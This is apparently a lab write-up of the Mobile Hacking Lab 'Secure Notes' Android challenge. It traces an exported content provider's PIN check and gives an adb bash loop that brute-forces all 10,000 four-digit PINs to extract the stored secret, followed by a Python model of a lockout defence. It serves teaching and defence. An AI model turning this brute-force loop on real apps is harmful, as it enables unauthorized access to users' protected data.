Secure notes

Hello everyone. In this blog post, I will try to explain my solution steps for the Secure Notes challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.

  1. Let’s examine the AndroidManifest.xml.

  2. After that, I found 2 providers (com.mobilehackinglab.securenotes.secretprovider and androidx.startup.InitializationProvider) and 1 exported activity (MainActivity).

  3. The MainActivity interacts with a content provider to validate a PIN and retrieve a secret value associated with that PIN.

  4. There is a listener set on submitPinButton:

    1. when it is clicked, the code calls the onCreate$lambda$0() function,

    2. which retrieves the text from pinEditText,

    3. then uses querySecretProvider to validate the entered PIN.

  5. Let’s analyze com.mobilehackinglab.securenotes.SecretDataProvider:

    1. First of all, the correct PIN is used as a key to decrypt the data stored in the config.properties file.

    2. Then let’s keep going through the code.

    3. It takes a query string.

    4. If the string is null, it returns null.

    5. If there is a value, it removes the prefix and then extracts the integer from it.

    6. In the end, it invokes decryptSecret().

    7. If the returned Cursor is valid, the code looks for the secret column to query the PIN.

    8. If a valid cursor is returned and data is available, the code looks for a column named "Secret", expecting this to hold the result of the query.

  6. Let’s go back to the config.properties file and try to decrypt it manually.

  7. Let’s try to brute-force the PIN to get the decrypted text:

    #!/bin/bash
    
    # Define the content provider URI
    CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider"
    
    # Loop through all 4-digit PIN combinations (0000 to 9999)
    for pin in $(seq -w 0000 9999); do
        echo "Trying PIN: $pin"
    
        # Use ADB to send the query to the content provider once per PIN
        # and keep the output so it can be both shown and checked
        result=$(adb shell content query --uri "$CONTENT_URI" --where "pin=$pin")
        echo "$result"
    
        # Check the output to see if it indicates a successful attempt
        # Assuming "Secret" is returned upon success, otherwise adjust the condition
        if echo "$result" | grep -q "Secret"; then
            echo "PIN found: $pin"
            break
        fi
    done
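
The loop above succeeds because the provider evaluates every guess and a 4-digit PIN has only 10,000 possible values. As an added example (not the app's code and not part of the original write-up), this Python model follows the query steps from step 5 and puts an attempt limit in front of the decrypt step; the `pin=` prefix is taken from the script above, while the class name, the limits and the stand-in for decryptSecret() are assumptions.

```python
import hmac
import time

PREFIX = "pin="          # selection prefix, as used in the script above
MAX_FAILURES = 5         # assumed policy value
LOCKOUT_SECONDS = 300    # assumed policy value


class GuardedPinCheck:
    """Hypothetical model of the provider's query path with a lockout guard."""

    def __init__(self, correct_pin, secret, clock=time.monotonic):
        self._pin = correct_pin
        self._secret = secret
        self._clock = clock
        self._failures = 0
        self._locked_until = 0.0

    def _decrypt_secret(self, pin):
        # Constructed stand-in for decryptSecret(): succeeds only for the right PIN.
        ok = hmac.compare_digest(f"{pin:04d}", self._pin)
        return self._secret if ok else None

    def query(self, selection):
        # Same shape as step 5: null check, strip the prefix, parse the integer.
        if selection is None or not selection.startswith(PREFIX):
            return None
        try:
            pin = int(selection[len(PREFIX):])
        except ValueError:
            return None
        if self._clock() < self._locked_until:
            return None                      # locked: the guess is not evaluated
        secret = self._decrypt_secret(pin)
        if secret is not None:
            self._failures = 0
            return {"Secret": secret}
        self._failures += 1
        if self._failures >= MAX_FAILURES:   # start a lockout window
            self._locked_until = self._clock() + LOCKOUT_SECONDS
            self._failures = 0
        return None


def demo():
    now = [0.0]                              # fake clock so the demo runs instantly
    check = GuardedPinCheck("4821", "constructed note", clock=lambda: now[0])
    wrong = [check.query(f"pin={p:04d}") for p in range(5)]   # five failures
    locked = check.query("pin=4821")         # correct PIN, but inside the lockout
    now[0] += LOCKOUT_SECONDS
    return wrong, locked, check.query("pin=4821")
```

During the lockout window even the correct PIN returns nothing, so a sequential sweep of the PIN space can no longer tell a wrong guess from a locked one.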
